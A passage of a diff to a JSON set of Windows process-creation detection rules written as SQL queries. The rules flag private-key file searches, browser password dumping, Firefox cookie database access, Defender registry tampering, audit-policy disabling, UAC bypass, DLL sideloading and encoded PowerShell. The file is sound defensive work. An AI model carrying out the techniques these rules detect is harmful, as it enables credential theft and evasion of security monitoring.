AND Channel = 'Security' AND (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' OR CommandLine LIKE '%netsh interface show interface%' ESCAPE '\\' OR CommandLine LIKE '%arp -a%' ESCAPE '\\' OR CommandLine LIKE '%nbtstat -n%' ESCAPE '\\' OR CommandLine LIKE '%net config%' ESCAPE '\\' OR CommandLine LIKE '%route print%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certoc_load_dll.yml" + "filename": "proc_creation_win_susp_network_command.yml" }, { - "title": "Private Keys Reconnaissance Via CommandLine Tools", - "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", - "status": "test", - "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "author": "frack113", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_private_keys_recon.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", + "title": "UtilityFunctions.ps1 Proxy Dll", + "id": "0403d67d-6227-4ea8-8145-4e72db7da120", "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_lolbin_utilityfunctions.yml" }, { - "title": "Potential Persistence Via Microsoft Compatibility Appraiser", - "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", "status": "experimental", - "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", - "author": "Sreeman", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "PUA - WebBrowserPassView Execution", - "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", + "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", "status": "experimental", - "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", - "author": "frack113", + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "@gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Web Browser Password Viewer' OR NewProcessName LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_webbrowserpassview.yml" + "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" }, { - "title": "Discovery of a System Time", - "id": "b243b280-65fe-48df-ba07-6ddea7646427", - "status": "test", - "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of the system utilities to discover system time for legitimate reason" + "Rare legitimate use by administrators to test software (should always be investigated)" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%time%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' AND CommandLine LIKE '%tz%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_time_discovery.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "status": "test", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_process_hacker.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "Potential DLL Injection Or Execution Using Tracker.exe", - "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "title": "Private Keys Reconnaissance Via CommandLine Tools", + "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "status": "test", - "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" ], - "filename": "proc_creation_win_lolbin_tracker.yml" + "filename": "proc_creation_win_susp_private_keys_recon.yml" }, { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "title": "Remote Access Tool - NetSupport Execution From Unusual Location", + "id": "37e8d358-6408-4853-82f4-98333fca7014", "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", + "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "status": "experimental", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Wlrmdr Lolbin Use as Launcher", + "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "author": "frack113, manasmbellani", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((NewProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentProcessName = '-')))))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_lolbin_wlrmdr.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Rundll32 Script in CommandLine", + "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "status": "experimental", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "frack113, Zaw Min Htun (ZETA)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_rundll32_script_run.yml" }, { 